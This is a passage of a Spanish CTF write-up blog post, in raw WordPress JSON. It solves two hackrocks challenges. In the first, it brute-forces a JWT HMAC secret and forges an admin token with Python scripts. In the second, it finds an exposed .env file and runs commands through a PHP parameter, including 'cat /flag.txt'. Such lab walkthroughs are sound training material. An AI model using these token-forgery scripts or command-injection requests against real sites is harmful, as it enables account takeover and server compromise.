abrimos devtools -> Almacenamiento<\/li>\n\n\n\n<li>Vemos la cookies<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"301\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627-1024x301.png\" alt=\"\" class=\"wp-image-24263\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627-1024x301.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627-300x88.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627-768x225.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627-1536x451.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-627.png 1877w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Pero necesitamos ir a message y mandar un mensaje para que nos aparezca una nueva llamada <\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"581\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-628-1024x581.png\" alt=\"\" class=\"wp-image-24264\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-628-1024x581.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-628-300x170.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-628-768x436.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-628.png 1245w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nos aparece x-access-token<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"410\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629-1024x410.png\" alt=\"\" class=\"wp-image-24265\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629-1024x410.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629-300x120.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629-768x307.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629-1536x615.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-629.png 1824w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>obtenemos su valor<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"845\" height=\"495\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-630.png\" alt=\"\" class=\"wp-image-24266\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-630.png 845w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-630-300x176.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-630-768x450.png 768w\" sizes=\"(max-width: 845px) 100vw, 845px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>y vamos a la pagina<\/li>\n\n\n\n<li><a href=\"https:\/\/www.jwt.io\/\">https:\/\/www.jwt.io\/<\/a><\/li>\n\n\n\n<li>y lo pegamos y nos da los valores<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJndWVzdCIsImlkIjoidGF2byIsImV4cCI6MTc3ODg2MTIzOH0.SZJpcH_VfF-Eex-vSPfLisYQJf2UfnEmK2cvJn0eEEQ<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"473\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-632-1024x473.png\" alt=\"\" class=\"wp-image-24268\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-632-1024x473.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-632-300x139.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-632-768x355.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-632.png 1437w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Identificaci\u00f3n del vector:<\/strong> el campo <code>public_id: \"guest\"<\/code> parece controlar los privilegios del usuario. Si lo cambiamos a <code>\"admin\"<\/code>, podr\u00edamos acceder a la secci\u00f3n Admin.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pero el JWT est\u00e1 firmado con HMAC-SHA256, as\u00ed que necesitamos forjar una firma v\u00e1lida.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\udd27 Paso 5: Brute force del secreto HS256 \u2014 comandos exactos<\/h3>\n\n\n\n<h4 class=\"wp-block-heading\">1) Preparar entorno y clonar <code>jwt_tool<\/code><\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">bash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd ~\ngit clone https:\/\/github.com\/ticarpi\/jwt_tool\ncd jwt_tool\npip3 install -r requirements.txt --break-system-packages<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">Si <code>pip3<\/code> te da error por \u00abexternally-managed-environment\u00bb, el flag <code>--break-system-packages<\/code> lo soluciona (usual en Kali\/Ubuntu modernos).<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">2) Crear el script de fuerza bruta<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">bash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cat &gt; crack_jwt.py &lt;&lt; 'EOF'\nimport hmac, hashlib, base64\n\n# JWT original (el de guest)\njwt = \"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJndWVzdCIsImlkIjoidGF2byIsImV4cCI6MTc3ODg1OTg4MH0.xf9YoL8KgLPUpfBzswf3gAkmo6Y_jq_4dh5DWDK8bIo\"\n\nheader_payload, signature_b64 = jwt.rsplit('.', 1)\n\ndef b64url_decode(s):\n    s += '=' * (-len(s) % 4)\n    return base64.urlsafe_b64decode(s)\n\nexpected_sig = b64url_decode(signature_b64)\n\nfound = None\ncount = 0\nwith open('jwt-common.txt', 'r', errors='ignore') as f:\n    for line in f:\n        s = line.rstrip('\\n').rstrip('\\r')\n        if not s:\n            continue\n        count += 1\n        sig = hmac.new(s.encode(), header_payload.encode(), hashlib.sha256).digest()\n        if sig == expected_sig:\n            found = s\n            break\n\nif found:\n    print(f\"&#91;+] SECRETO ENCONTRADO tras {count} intentos: '{found}'\")\nelse:\n    print(f\"&#91;-] No encontrado en {count} candidatos.\")\nEOF<\/code><\/pre>\n\n\n\n<blockquote class=\"wp-block-quote is-layout-flow wp-block-quote-is-layout-flow\">\n<p class=\"wp-block-paragraph\">\u26a0\ufe0f Importante: si tu JWT original es distinto al m\u00edo (porque te registraste con otro nombre y la <code>exp<\/code> cambia), reemplaza la l\u00ednea <code>jwt = \"...\"<\/code> por tu token real antes de ejecutar.<\/p>\n<\/blockquote>\n\n\n\n<h4 class=\"wp-block-heading\">3) Ejecutar el ataque<\/h4>\n\n\n\n<p class=\"wp-block-paragraph\">bash<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python3 crack_jwt.py<\/code><\/pre>\n\n\n\n<p class=\"wp-block-paragraph\"><strong>Salida esperada:<\/strong><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&#91;+] SECRETO ENCONTRADO tras 6 intentos: '12345'<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"871\" height=\"639\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-633.png\" alt=\"\" class=\"wp-image-24269\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-633.png 871w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-633-300x220.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-633-768x563.png 768w\" sizes=\"(max-width: 871px) 100vw, 871px\" \/><\/figure>\n\n\n\n<p class=\"wp-block-paragraph\">Con el secreto conocido, generamos un JWT v\u00e1lido con <code>public_id: \"admin\"<\/code>:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>creamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>cat > crack_jwt2.py &lt;&lt; 'EOF'\nimport hmac, hashlib, base64, json\n\nsecret = \"12345\"\nheader  = {\"alg\":\"HS256\",\"typ\":\"JWT\"}\npayload = {\"public_id\":\"admin\",\"id\":\"tavo\",\"exp\":1778859880}\n\ndef b64url(d):\n    return base64.urlsafe_b64encode(json.dumps(d, separators=(',',':')).encode()).rstrip(b'=').decode()\n\nh = b64url(header)\np = b64url(payload)\nmsg = f\"{h}.{p}\"\nsig = hmac.new(secret.encode(), msg.encode(), hashlib.sha256).digest()\ns = base64.urlsafe_b64encode(sig).rstrip(b'=').decode()\nprint(f\"{msg}.{s}\")\nEOF\n\npython3 crack_jwt2.py<\/code><\/pre>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Nos da el resultado<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJwdWJsaWNfaWQiOiJhZG1pbiIsImlkIjoidGF2byIsImV4cCI6MTc3ODg1OTg4MH0.5vElQVdTCVshDd-m7NobDEKW2LxczZ6_1yfgXw7NB-M<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"945\" height=\"307\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-634.png\" alt=\"\" class=\"wp-image-24270\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-634.png 945w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-634-300x97.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-634-768x249.png 768w\" sizes=\"(max-width: 945px) 100vw, 945px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">\ud83d\ude80 Paso 7: Explotaci\u00f3n<\/h3>\n\n\n\n<ol class=\"wp-block-list\">\n<li><strong>DevTools \u2192 Almacenamiento \u2192 Cookies \u2192 <code>challenges.hackrocks.com<\/code><\/strong><\/li>\n\n\n\n<li>Editar <code>x-access-token<\/code> y pegar el JWT forjado<\/li>\n\n\n\n<li>Navegar a <code>https:\/\/challenges.hackrocks.com\/bad-cookie\/admin<\/code><\/li>\n\n\n\n<li>La p\u00e1gina de admin se carga y muestra la flag \u2705<\/li>\n<\/ol>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Respuesta<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{wh0a_y0u_g0t_m3_g00d_thr0ugh_jwt}<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"737\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-635-1024x737.png\" alt=\"\" class=\"wp-image-24271\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-635-1024x737.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-635-300x216.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-635-768x552.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-635.png 1069w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Reto: Oculto en la Web<\/h2>\n\n\n\n<h2 class=\"wp-block-heading\">Resumen<\/h2>\n\n\n\n<p class=\"wp-block-paragraph\">En este caso, tenemos una empresa que nos solicita ayuda para auditar la p\u00e1gina web que est\u00e1 desarrollando, que actualmente est\u00e1\u00a0<em>\u00aben mantenimiento\u00bb<\/em>. \u00bfTe atreves a hacer el pentesting?<br><br><\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Pon a punto tu conjunto de herramientas, y prep\u00e1rate para comenzar la auditor\u00eda&#8230;<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Para acceder al reto, haz click en el siguiente enlace:&nbsp;<a target=\"_blank\" rel=\"noreferrer noopener\" href=\"https:\/\/challenges.hackrocks.com\/hidden\/\">https:\/\/challenges.hackrocks.com\/hidden\/<\/a><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Solucion<\/h2>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Ingresamos a la pagina <a href=\"https:\/\/challenges.hackrocks.com\/hidden\/\">https:\/\/challenges.hackrocks.com\/hidden\/<\/a><\/li>\n\n\n\n<li>vamos a devtool -> pagina -> respuesta -vemos el c\u00f3digo &#8211; vemos un mensaje oculto<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"516\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636-1024x516.png\" alt=\"\" class=\"wp-image-24273\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636-1024x516.png 1024w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636-300x151.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636-768x387.png 768w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636-1536x774.png 1536w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-636.png 1798w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;!-- \n\nHey Marcus, dont forget to change the permission of environment. thanks!\n\nSincerely, Adrian\n --><\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">1. La pista del archivo (La ruta m\u00e1s probable)<\/h3>\n\n\n\n<p class=\"wp-block-paragraph\">Adrian le dice a Marcus que \u00abcambie los permisos de <strong>environment<\/strong>\u00ab. En desarrollo web, \u00abenvironment\u00bb casi siempre se refiere a los archivos de configuraci\u00f3n del entorno.<\/p>\n\n\n\n<p class=\"wp-block-paragraph\">Debes intentar buscar archivos ocultos en la ra\u00edz del servidor web relacionados con esa palabra. Prueba a buscar en la URL de tu reto cosas como:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>\/.env<\/code> (Este es el candidato n\u00famero uno en aplicaciones modernas como Laravel, Node, etc. Suele contener contrase\u00f1as y flags).<\/li>\n\n\n\n<li><code>\/environment<\/code><\/li>\n\n\n\n<li><code>\/env<\/code><\/li>\n\n\n\n<li><code>\/.env.local<\/code> o <code>\/.env.dev<\/code><\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>ingresamos entonces a <\/li>\n\n\n\n<li><a href=\"https:\/\/challenges.hackrocks.com\/hidden\/.env\">https:\/\/challenges.hackrocks.com\/hidden\/.env<\/a><\/li>\n\n\n\n<li>y vemos una pagina<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"928\" height=\"296\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-637.png\" alt=\"\" class=\"wp-image-24274\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-637.png 928w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-637-300x96.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-637-768x245.png 768w\" sizes=\"(max-width: 928px) 100vw, 928px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>nos dice que <\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Si analizamos las variables que encontraste:<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li><code>PATH=\/s3cr3t_3ntr4nce.php<\/code> -> Es el script al que debes apuntar.<\/li>\n\n\n\n<li><code>CMD=c0mm<\/code> -> Este es el nombre del <strong>par\u00e1metro<\/strong> que la p\u00e1gina est\u00e1 esperando.<\/li>\n\n\n\n<li><code>METHOD=GET<\/code> -> Significa que debes pasar ese par\u00e1metro directamente a trav\u00e9s de la URL (Query String).<\/li>\n<\/ul>\n\n\n\n<p class=\"wp-block-paragraph\">Esto huele fuertemente a una vulnerabilidad de <strong>RCE (Remote Code Execution)<\/strong> o ejecuci\u00f3n remota de comandos, donde el servidor ejecuta lo que le mandes en la variable <code>c0mm<\/code>.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>probamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>https:&#47;&#47;challenges.hackrocks.com\/hidden\/s3cr3t_3ntr4nce.php?c0mm=whoami<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"854\" height=\"192\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-638.png\" alt=\"\" class=\"wp-image-24275\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-638.png 854w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-638-300x67.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-638-768x173.png 768w\" sizes=\"(max-width: 854px) 100vw, 854px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>probamos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>https:&#47;&#47;challenges.hackrocks.com\/hidden\/s3cr3t_3ntr4nce.php?c0mm=ls<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"770\" height=\"292\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-639.png\" alt=\"\" class=\"wp-image-24276\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-639.png 770w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-639-300x114.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-639-768x291.png 768w\" sizes=\"(max-width: 770px) 100vw, 770px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>no esta en la raiz vemos si podemos ver la raiz<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>https:\/\/challenges.hackrocks.com\/hidden\/s3cr3t_3ntr4nce.php?c0mm=ls \/<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"803\" height=\"214\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-640.png\" alt=\"\" class=\"wp-image-24277\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-640.png 803w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-640-300x80.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-640-768x205.png 768w\" sizes=\"(max-width: 803px) 100vw, 803px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\">\n<li>nostramos<\/li>\n<\/ul>\n\n\n\n<pre class=\"wp-block-code\"><code>https:&#47;&#47;challenges.hackrocks.com\/hidden\/s3cr3t_3ntr4nce.php?c0mm=cat%20\/flag.txt<\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"856\" height=\"254\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-641.png\" alt=\"\" class=\"wp-image-24278\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-641.png 856w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-641-300x89.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-641-768x228.png 768w\" sizes=\"(max-width: 856px) 100vw, 856px\" \/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{m4rcus_f0rg0t_t0_change_perm_env_and_igot_shell} <\/code><\/pre>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"962\" height=\"730\" src=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-642.png\" alt=\"\" class=\"wp-image-24279\" srcset=\"https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-642.png 962w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-642-300x228.png 300w, https:\/\/sada.services\/wp-content\/uploads\/2026\/04\/image-642-768x583.png 768w\" sizes=\"(max-width: 962px) 100vw, 962px\" \/><\/figure>\n","protected":false},"excerpt":{"rendered":"<p>Reto: Guardar contrase\u00f1a reto: Veracruz Hallazgo clave: contenedor.pdf devuelve data \u2014 NO es un PDF real. Hallazgo: No tiene magic bytes de PDF (%PDF). Es binario cifrado de alta entrop\u00eda. Todo archivo tiene una \u00abfirma\u00bb \u2014 los primeros bytes que identifican su formato. Es como el DNI del archivo, independientemente de su extensi\u00f3n. AGDDesa Hallazgo: [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-23378","post","type-post","status-publish","format-standard","hentry","category-sin-categoria"],"blocksy_meta":[],"_links":{"self":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23378","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23378"}],"version-history":[{"count":6,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23378\/revisions"}],"predecessor-version":[{"id":24280,"href":"https:\/\/sada.services\/index.php?rest_route=\/wp\/v2\/posts\/23378\/revisions\/24280"}],"wp:attachment":[{"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23378"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=23378"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/sada.services\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=23378"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}